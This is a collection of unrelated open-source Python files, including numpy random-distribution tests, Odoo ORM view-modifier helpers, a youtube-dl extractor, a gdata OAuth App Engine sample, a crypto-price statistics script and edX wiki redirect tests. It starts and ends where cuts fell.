mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState().poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(TestCase):
# make sure each state produces the same sequence even in threads
def setUp(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(TestCase):
def setUp(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
self.assertEqual(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
self.assertEqual(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
self.assertEqual(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
self.assertEqual(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [np.bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
self.assertEqual(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
self.assertEqual(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
self.assertEqual(out.shape, self.tgtShape)
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
OpusVL/odoo | openerp/osv/orm.py | 126 | 6167 | import simplejson
from lxml import etree
from ..exceptions import except_orm
from ..models import (
MetaModel,
BaseModel,
Model, TransientModel, AbstractModel,
MAGIC_COLUMNS,
LOG_ACCESS_COLUMNS,
)
# extra definitions for backward compatibility
browse_record_list = BaseModel
class browse_record(object):
""" Pseudo-class for testing record instances """
class __metaclass__(type):
def __instancecheck__(self, inst):
return isinstance(inst, BaseModel) and len(inst) <= 1
class browse_null(object):
""" Pseudo-class for testing null instances """
class __metaclass__(type):
def __instancecheck__(self, inst):
return isinstance(inst, BaseModel) and not inst
def transfer_field_to_modifiers(field, modifiers):
default_values = {}
state_exceptions = {}
for attr in ('invisible', 'readonly', 'required'):
state_exceptions[attr] = []
default_values[attr] = bool(field.get(attr))
for state, modifs in (field.get("states",{})).items():
for modif in modifs:
if default_values[modif[0]] != modif[1]:
state_exceptions[modif[0]].append(state)
for attr, default_value in default_values.items():
if state_exceptions[attr]:
modifiers[attr] = [("state", "not in" if default_value else "in", state_exceptions[attr])]
else:
modifiers[attr] = default_value
# Don't deal with groups, it is done by check_group().
# Need the context to evaluate the invisible attribute on tree views.
# For non-tree views, the context shouldn't be given.
def transfer_node_to_modifiers(node, modifiers, context=None, in_tree_view=False):
if node.get('attrs'):
modifiers.update(eval(node.get('attrs')))
if node.get('states'):
if 'invisible' in modifiers and isinstance(modifiers['invisible'], list):
# TODO combine with AND or OR, use implicit AND for now.
modifiers['invisible'].append(('state', 'not in', node.get('states').split(',')))
else:
modifiers['invisible'] = [('state', 'not in', node.get('states').split(','))]
for a in ('invisible', 'readonly', 'required'):
if node.get(a):
v = bool(eval(node.get(a), {'context': context or {}}))
if in_tree_view and a == 'invisible':
# Invisible in a tree view has a specific meaning, make it a
# new key in the modifiers attribute.
modifiers['tree_invisible'] = v
elif v or (a not in modifiers or not isinstance(modifiers[a], list)):
# Don't set the attribute to False if a dynamic value was
# provided (i.e. a domain from attrs or states).
modifiers[a] = v
def simplify_modifiers(modifiers):
for a in ('invisible', 'readonly', 'required'):
if a in modifiers and not modifiers[a]:
del modifiers[a]
def transfer_modifiers_to_node(modifiers, node):
if modifiers:
simplify_modifiers(modifiers)
node.set('modifiers', simplejson.dumps(modifiers))
def setup_modifiers(node, field=None, context=None, in_tree_view=False):
""" Processes node attributes and field descriptors to generate
the ``modifiers`` node attribute and set it on the provided node.
Alters its first argument in-place.
:param node: ``field`` node from an OpenERP view
:type node: lxml.etree._Element
:param dict field: field descriptor corresponding to the provided node
:param dict context: execution context used to evaluate node attributes
:param bool in_tree_view: triggers the ``tree_invisible`` code
path (separate from ``invisible``): in
tree view there are two levels of
invisibility, cell content (a column is
present but the cell itself is not
displayed) with ``invisible`` and column
invisibility (the whole column is
hidden) with ``tree_invisible``.
:returns: nothing
"""
modifiers = {}
if field is not None:
transfer_field_to_modifiers(field, modifiers)
transfer_node_to_modifiers(
node, modifiers, context=context, in_tree_view=in_tree_view)
transfer_modifiers_to_node(modifiers, node)
def test_modifiers(what, expected):
modifiers = {}
if isinstance(what, basestring):
node = etree.fromstring(what)
transfer_node_to_modifiers(node, modifiers)
simplify_modifiers(modifiers)
json = simplejson.dumps(modifiers)
assert json == expected, "%s != %s" % (json, expected)
elif isinstance(what, dict):
transfer_field_to_modifiers(what, modifiers)
simplify_modifiers(modifiers)
json = simplejson.dumps(modifiers)
assert json == expected, "%s != %s" % (json, expected)
# To use this test:
# import openerp
# openerp.osv.orm.modifiers_tests()
def modifiers_tests():
test_modifiers('<field name="a"/>', '{}')
test_modifiers('<field name="a" invisible="1"/>', '{"invisible": true}')
test_modifiers('<field name="a" readonly="1"/>', '{"readonly": true}')
test_modifiers('<field name="a" required="1"/>', '{"required": true}')
test_modifiers('<field name="a" invisible="0"/>', '{}')
test_modifiers('<field name="a" readonly="0"/>', '{}')
test_modifiers('<field name="a" required="0"/>', '{}')
test_modifiers('<field name="a" invisible="1" required="1"/>', '{"invisible": true, "required": true}') # TODO order is not guaranteed
test_modifiers('<field name="a" invisible="1" required="0"/>', '{"invisible": true}')
test_modifiers('<field name="a" invisible="0" required="1"/>', '{"required": true}')
test_modifiers("""<field name="a" attrs="{'invisible': [('b', '=', 'c')]}"/>""", '{"invisible": [["b", "=", "c"]]}')
# The dictionary is supposed to be the result of fields_get().
test_modifiers({}, '{}')
test_modifiers({"invisible": True}, '{"invisible": true}')
test_modifiers({"invisible": False}, '{}')
| agpl-3.0 |
axbaretto/beam | sdks/python/apache_beam/runners/worker/statesampler_fake.py | 7 | 1339 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This module is experimental. No backwards-compatibility guarantees.
class StateSampler(object):
def __init__(self, *args, **kwargs):
pass
def scoped_state(self, step_name, state_name=None, io_target=None):
return _FakeScopedState()
def start(self):
pass
def stop(self):
pass
def stop_if_still_running(self):
self.stop()
def commit_counters(self):
pass
class _FakeScopedState(object):
def __enter__(self):
pass
def __exit__(self, *unused_args):
pass
def sampled_seconds(self):
return 0
| apache-2.0 |
kthordarson/youtube-dl-ruv | youtube_dl/extractor/savefrom.py | 185 | 1131 | # coding: utf-8
from __future__ import unicode_literals
import os.path
import re
from .common import InfoExtractor
class SaveFromIE(InfoExtractor):
IE_NAME = 'savefrom.net'
_VALID_URL = r'https?://[^.]+\.savefrom\.net/\#url=(?P<url>.*)$'
_TEST = {
'url': 'http://en.savefrom.net/#url=http://youtube.com/watch?v=UlVRAPW2WJY&utm_source=youtube.com&utm_medium=short_domains&utm_campaign=ssyoutube.com',
'info_dict': {
'id': 'UlVRAPW2WJY',
'ext': 'mp4',
'title': 'About Team Radical MMA | MMA Fighting',
'upload_date': '20120816',
'uploader': 'Howcast',
'uploader_id': 'Howcast',
'description': 're:(?s).* Hi, my name is Rene Dreifuss\. And I\'m here to show you some MMA.*',
},
'params': {
'skip_download': True
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = os.path.splitext(url.split('/')[-1])[0]
return {
'_type': 'url',
'id': video_id,
'url': mobj.group('url'),
}
| unlicense |
anaran/kuma | kuma/wiki/management/commands/generate_sphinx_template.py | 5 | 1665 | from django.conf import settings
from django.core.management.base import NoArgsCommand
from django.shortcuts import render
from django.test import RequestFactory
from django.utils.translation import ugettext
from html5lib import constants as html5lib_constants
from kuma.wiki.content import parse
class Command(NoArgsCommand):
def handle(self, *args, **options):
# Not ideal, but we need to temporarily remove inline elemnents as a
# void/ignored element
# TO DO: Can this clone code be shortened?
new_void_set = set()
for item in html5lib_constants.voidElements:
new_void_set.add(item)
new_void_set.remove('link')
new_void_set.remove('img')
html5lib_constants.voidElements = frozenset(new_void_set)
# Create a mock request for the sake of rendering the template
request = RequestFactory().get('/')
request.LANGUAGE_CODE = settings.LANGUAGE_CODE
request.META['SERVER_NAME'] = 'developer.mozilla.org'
# Load the page with sphinx template
content = render(request, 'wiki/sphinx.html',
{'is_sphinx': True, 'gettext': ugettext}).content
# Use a filter to make links absolute
tool = parse(content, is_full_document=True)
content = tool.absolutizeAddresses(
base_url=settings.PRODUCTION_URL,
tag_attributes={
'a': 'href',
'img': 'src',
'form': 'action',
'link': 'href',
'script': 'src'
}).serialize()
# Output the response
print content.encode('utf8')
| mpl-2.0 |
campbe13/openhatch | vendor/packages/gdata/samples/oauth/oauth_on_appengine/main_hmac.py | 126 | 7397 | #!/usr/bin/python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'e.bidelman (Eric Bidelman)'
import cgi
import os
import gdata.auth
import gdata.docs
import gdata.docs.service
import gdata.alt.appengine
from appengine_utilities.sessions import Session
from django.utils import simplejson
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
SETTINGS = {
'APP_NAME': 'google-GDataOAuthAppEngine-v1',
'CONSUMER_KEY': 'YOUR_CONSUMER_KEY',
'CONSUMER_SECRET': 'YOUR_CONSUMER_SECRET',
'SIG_METHOD': gdata.auth.OAuthSignatureMethod.HMAC_SHA1,
'SCOPES': ['http://docs.google.com/feeds/',
'https://docs.google.com/feeds/']
}
gdocs = gdata.docs.service.DocsService(source=SETTINGS['APP_NAME'])
gdocs.SetOAuthInputParameters(SETTINGS['SIG_METHOD'], SETTINGS['CONSUMER_KEY'],
consumer_secret=SETTINGS['CONSUMER_SECRET'])
gdata.alt.appengine.run_on_appengine(gdocs)
class MainPage(webapp.RequestHandler):
"""Main page displayed to user."""
# GET /
def get(self):
if not users.get_current_user():
self.redirect(users.create_login_url(self.request.uri))
access_token = gdocs.token_store.find_token('%20'.join(SETTINGS['SCOPES']))
if isinstance(access_token, gdata.auth.OAuthToken):
form_action = '/fetch_data'
form_value = 'Now fetch my docs!'
revoke_token_link = True
else:
form_action = '/get_oauth_token'
form_value = 'Give this website access to my Google Docs'
revoke_token_link = None
template_values = {
'form_action': form_action,
'form_value': form_value,
'user': users.get_current_user(),
'revoke_token_link': revoke_token_link,
'oauth_token': access_token,
'consumer': gdocs.GetOAuthInputParameters().GetConsumer(),
'sig_method': gdocs.GetOAuthInputParameters().GetSignatureMethod().get_name()
}
path = os.path.join(os.path.dirname(__file__), 'index.html')
self.response.out.write(template.render(path, template_values))
class OAuthDance(webapp.RequestHandler):
"""Handler for the 3 legged OAuth dance, v1.0a."""
"""This handler is responsible for fetching an initial OAuth request token,
redirecting the user to the approval page. When the user grants access, they
will be redirected back to this GET handler and their authorized request token
will be exchanged for a long-lived access token."""
# GET /get_oauth_token
def get(self):
"""Invoked after we're redirected back from the approval page."""
self.session = Session()
oauth_token = gdata.auth.OAuthTokenFromUrl(self.request.uri)
if oauth_token:
oauth_token.secret = self.session['oauth_token_secret']
oauth_token.oauth_input_params = gdocs.GetOAuthInputParameters()
gdocs.SetOAuthToken(oauth_token)
# 3.) Exchange the authorized request token for an access token
oauth_verifier = self.request.get('oauth_verifier', default_value='')
access_token = gdocs.UpgradeToOAuthAccessToken(
oauth_verifier=oauth_verifier)
# Remember the access token in the current user's token store
if access_token and users.get_current_user():
gdocs.token_store.add_token(access_token)
elif access_token:
gdocs.current_token = access_token
gdocs.SetOAuthToken(access_token)
self.redirect('/')
# POST /get_oauth_token
def post(self):
"""Fetches a request token and redirects the user to the approval page."""
self.session = Session()
if users.get_current_user():
# 1.) REQUEST TOKEN STEP. Provide the data scope(s) and the page we'll
# be redirected back to after the user grants access on the approval page.
req_token = gdocs.FetchOAuthRequestToken(
scopes=SETTINGS['SCOPES'], oauth_callback=self.request.uri)
# When using HMAC, persist the token secret in order to re-create an
# OAuthToken object coming back from the approval page.
self.session['oauth_token_secret'] = req_token.secret
# Generate the URL to redirect the user to. Add the hd paramter for a
# better user experience. Leaving it off will give the user the choice
# of what account (Google vs. Google Apps) to login with.
domain = self.request.get('domain', default_value='default')
approval_page_url = gdocs.GenerateOAuthAuthorizationURL(
extra_params={'hd': domain})
# 2.) APPROVAL STEP. Redirect to user to Google's OAuth approval page.
self.redirect(approval_page_url)
class FetchData(OAuthDance):
"""Fetches the user's data."""
"""This class inherits from OAuthDance in order to utilize OAuthDance.post()
in case of a request error (e.g. the user has a bad token)."""
# GET /fetch_data
def get(self):
self.redirect('/')
# POST /fetch_data
def post(self):
"""Fetches the user's data."""
try:
feed = gdocs.GetDocumentListFeed()
json = []
for entry in feed.entry:
if entry.lastModifiedBy is not None:
last_modified_by = entry.lastModifiedBy.email.text
else:
last_modified_by = ''
if entry.lastViewed is not None:
last_viewed = entry.lastViewed.text
else:
last_viewed = ''
json.append({'title': entry.title.text,
'links': {'alternate': entry.GetHtmlLink().href},
'published': entry.published.text,
'updated': entry.updated.text,
'resourceId': entry.resourceId.text,
'type': entry.GetDocumentType(),
'lastModifiedBy': last_modified_by,
'lastViewed': last_viewed
})
self.response.out.write(simplejson.dumps(json))
except gdata.service.RequestError, error:
OAuthDance.post(self)
class RevokeToken(webapp.RequestHandler):
# GET /revoke_token
def get(self):
"""Revokes the current user's OAuth access token."""
try:
gdocs.RevokeOAuthToken()
except gdata.service.RevokingOAuthTokenFailed:
pass
gdocs.token_store.remove_all_tokens()
self.redirect('/')
def main():
application = webapp.WSGIApplication([('/', MainPage),
('/get_oauth_token', OAuthDance),
('/fetch_data', FetchData),
('/revoke_token', RevokeToken)],
debug=True)
run_wsgi_app(application)
| agpl-3.0 |
lorganthesorn/CryptoArb | Analysis/Stats.py | 1 | 1747 | import numpy as np
import pandas as pd
from scipy import stats
from matplotlib import pyplot as plt
from statsmodels.tsa.stattools import grangercausalitytests
from GetHistory import CrpytoCompare
def granger_test(base='BTC', quote='USD', exchange1='Bitfinex', exchange2='BitTrex'):
df_ex1 = CrpytoCompare.crypto_close(base, quote, exchange1)
df_ex2 = CrpytoCompare.crypto_close(base, quote, exchange2)
df = pd.concat([df_ex1.diff(), df_ex2.diff()], axis=1, join='inner')
df.dropna(inplace=True)
#print(df)
print(grangercausalitytests(df, 5))
def correlation(df):
df1 = df.dropna().drop_duplicates()
dfP = df1.dropna(axis=1, how='any')
m = dfP.mean(axis=0)
s = dfP.std(ddof=1, axis=0)
# normalised time-series as an input for PCA
dfPort = (dfP - m)/s
c = np.cov(dfPort.values.T) # covariance matrix
co = np.corrcoef(dfP.values.T) # correlation matrix
tickers = list(dfP.columns)
plt.figure(figsize=(8,8))
plt.imshow(co, cmap="RdGy", interpolation="nearest")
cb = plt.colorbar()
cb.set_label("Correlation Matrix Coefficients")
plt.title("Correlation Matrix", fontsize=14)
plt.xticks(np.arange(len(tickers)), tickers, rotation=90)
plt.yticks(np.arange(len(tickers)), tickers)
# perform PCA
#w, v = np.linalg.eig(c)
#ax = plt.figure(figsize=(8,8)).gca()
#plt.imshow(v, cmap="bwr", interpolation="nearest")
#cb = plt.colorbar()
#plt.yticks(np.arange(len(tickers)), tickers)
#plt.xlabel("PC Number")
#plt.title("PCA", fontsize=14)
# force x-tickers to be displayed as integers (not floats)
#ax.xaxis.set_major_locator(MaxNLocator(integer=True))
plt.show()
if __name__ == '__main__':
granger_test() | mit |
Endika/edx-platform | lms/djangoapps/course_wiki/tests/tests.py | 19 | 6909 | from django.core.urlresolvers import reverse
from nose.plugins.attrib import attr
from courseware.tests.tests import LoginEnrollmentTestCase
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from mock import patch
@attr('shard_1')
class WikiRedirectTestCase(LoginEnrollmentTestCase, ModuleStoreTestCase):
"""
Tests for wiki course redirection.
"""
def setUp(self):
super(WikiRedirectTestCase, self).setUp()
self.toy = CourseFactory.create(org='edX', course='toy', display_name='2012_Fall')
# Create two accounts
self.student = 'view@test.com'
self.instructor = 'view2@test.com'
self.password = 'foo'
for username, email in [('u1', self.student), ('u2', self.instructor)]:
self.create_account(username, email, self.password)
self.activate_user(email)
self.logout()
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': True})
def test_wiki_redirect(self):
"""
Test that requesting wiki URLs redirect properly to or out of classes.
An enrolled in student going from /courses/edX/toy/2012_Fall/progress
to /wiki/some/fake/wiki/page/ will redirect to
/courses/edX/toy/2012_Fall/wiki/some/fake/wiki/page/
An unenrolled student going to /courses/edX/toy/2012_Fall/wiki/some/fake/wiki/page/
will be redirected to /wiki/some/fake/wiki/page/
"""
self.login(self.student, self.password)
self.enroll(self.toy)
referer = reverse("progress", kwargs={'course_id': self.toy.id.to_deprecated_string()})
destination = reverse("wiki:get", kwargs={'path': 'some/fake/wiki/page/'})
redirected_to = referer.replace("progress", "wiki/some/fake/wiki/page/")
resp = self.client.get(destination, HTTP_REFERER=referer)
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp['Location'], 'http://testserver' + redirected_to)
# Now we test that the student will be redirected away from that page if the course doesn't exist
# We do this in the same test because we want to make sure the redirected_to is constructed correctly
# This is a location like /courses/*/wiki/* , but with an invalid course ID
bad_course_wiki_page = redirected_to.replace(self.toy.location.course, "bad_course")
resp = self.client.get(bad_course_wiki_page, HTTP_REFERER=referer)
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp['Location'], 'http://testserver' + destination)
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': False})
def test_wiki_no_root_access(self):
"""
Test to verify that normally Wiki's cannot be browsed from the /wiki/xxxx/yyy/zz URLs
"""
self.login(self.student, self.password)
self.enroll(self.toy)
referer = reverse("progress", kwargs={'course_id': self.toy.id.to_deprecated_string()})
destination = reverse("wiki:get", kwargs={'path': 'some/fake/wiki/page/'})
resp = self.client.get(destination, HTTP_REFERER=referer)
self.assertEqual(resp.status_code, 403)
def create_course_page(self, course):
"""
Test that loading the course wiki page creates the wiki page.
The user must be enrolled in the course to see the page.
"""
course_wiki_home = reverse('course_wiki', kwargs={'course_id': course.id.to_deprecated_string()})
referer = reverse("progress", kwargs={'course_id': self.toy.id.to_deprecated_string()})
resp = self.client.get(course_wiki_home, follow=True, HTTP_REFERER=referer)
course_wiki_page = referer.replace('progress', 'wiki/' + self.toy.wiki_slug + "/")
ending_location = resp.redirect_chain[-1][0]
self.assertEquals(ending_location, 'http://testserver' + course_wiki_page)
self.assertEquals(resp.status_code, 200)
self.has_course_navigator(resp)
def has_course_navigator(self, resp):
"""
Ensure that the response has the course navigator.
"""
self.assertContains(resp, "Home")
self.assertContains(resp, "Course")
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': True})
def test_course_navigator(self):
""""
Test that going from a course page to a wiki page contains the course navigator.
"""
self.login(self.student, self.password)
self.enroll(self.toy)
self.create_course_page(self.toy)
course_wiki_page = reverse('wiki:get', kwargs={'path': self.toy.wiki_slug + '/'})
referer = reverse("courseware", kwargs={'course_id': self.toy.id.to_deprecated_string()})
resp = self.client.get(course_wiki_page, follow=True, HTTP_REFERER=referer)
self.has_course_navigator(resp)
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': True})
def test_wiki_not_accessible_when_not_enrolled(self):
"""
Test that going from a course page to a wiki page when not enrolled
redirects a user to the course about page
"""
self.login(self.instructor, self.password)
self.enroll(self.toy)
self.create_course_page(self.toy)
self.logout()
self.login(self.student, self.password)
course_wiki_page = reverse('wiki:get', kwargs={'path': self.toy.wiki_slug + '/'})
referer = reverse("courseware", kwargs={'course_id': self.toy.id.to_deprecated_string()})
# When not enrolled, we should get a 302
resp = self.client.get(course_wiki_page, follow=False, HTTP_REFERER=referer)
self.assertEqual(resp.status_code, 302)
# and end up at the course about page
resp = self.client.get(course_wiki_page, follow=True, HTTP_REFERER=referer)
target_url, __ = resp.redirect_chain[-1]
self.assertTrue(
target_url.endswith(reverse('about_course', args=[self.toy.id.to_deprecated_string()]))
)
@patch.dict("django.conf.settings.FEATURES", {'ALLOW_WIKI_ROOT_ACCESS': True})
def test_redirect_when_not_logged_in(self):
"""
Test that attempting to reach a course wiki page when not logged in
redirects the user to the login page
"""
self.logout()
course_wiki_page = reverse('wiki:get', kwargs={'path': self.toy.wiki_slug + '/'})
# When not logged in, we should get a 302
resp = self.client.get(course_wiki_page, follow=False)
self.assertEqual(resp.status_code, 302)
# and end up at the login page
resp = self.client.get(course_wiki_page, follow=True)
target_url, __ = resp.redirect_chain[-1]
self.assertTrue(reverse('signin_user') in target_url)
| agpl-3.0 |
wuby986/Sixty-4Stroke-kernel | tools/perf/util/setup.py | 2079 | 1438 | #!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
